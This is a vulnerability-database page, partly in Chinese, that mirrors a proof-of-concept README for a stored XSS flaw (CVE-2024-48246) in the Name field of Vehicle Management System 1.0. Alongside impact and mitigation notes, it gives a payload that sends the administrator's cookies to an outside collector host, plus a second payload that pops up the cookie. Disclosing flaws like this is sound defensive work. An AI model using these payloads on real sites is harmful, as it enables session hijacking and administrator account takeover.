漏洞平台

POC详情： ef6054890fb4abed8e2f8e5e3983f31306e61e1f

来源

https://github.com/ShadowByte1/CVE-2024-48246

关联漏洞

标题： N/A (CVE-2024-48246)
描述：车辆管理系统1.0中的/vehicle-management/booking.php页面的"Name"参数存在存储型跨站脚本（XSS）漏洞。

描述

Vehicle Management System 1.0 - Stored Cross-Site Scripting (XSS)

介绍

# CVE-2024-48246
Vehicle Management System 1.0 - Stored Cross-Site Scripting (XSS)

# Description

Vehicle Management System 1.0 contains a Stored Cross-Site Scripting (XSS) vulnerability in the Name parameter of /vehicle-management/booking.php. A malicious actor can inject malicious payloads into the Name field, which are stored and executed when an administrator views the booking list on /vehicle-management/bookinglist.php. This can lead to session hijacking or administrative account takeover.

# Affected Parameter

Name=

# Affected Endpoints

/vehicle-management/booking.php

/vehicle-management/bookinglist.php

# Vulnerability Details

Type: Cross-Site Scripting (XSS)

Vendor: Vehicle Management System

Affected Version: 1.0

# Attack Vectors

Guest User Attack:

A guest user inputs a payload into the Name parameter at /vehicle-management/booking.php.
The malicious payload gets stored and executed when an admin views /vehicle-management/bookinglist.php.
Example payload for session hijacking:

```
<img src=x onerror=this.src='http://oastify.com"+document.cookie>
```

# Alert Example:

Another payload can trigger an alert or perform other malicious actions without requiring cookies:

```
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
```

Note: A SQL Injection error may occur during payload submission, but it will still get stored and executed.

# Impact

Exploiting this vulnerability allows attackers to:

Execute arbitrary JavaScript in the context of the administrator’s session.

Hijack administrator sessions via stolen cookies.

Perform unauthorized actions or escalate privileges.

# Mitigation

Sanitize and encode user input for all parameters, especially Name.

Implement a Content Security Policy (CSP) to limit script execution.

Update to a patched version if available.

# Severity

High (CVSS: 8.2)

Attack Vector: Network

Privileges Required: Low

User Interaction: Partially Required (Admin views booking list)

文件快照


 [4.0K]  /data/pocs/ef6054890fb4abed8e2f8e5e3983f31306e61e1f
├── [1.0K]  LICENSE
└── [2.0K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。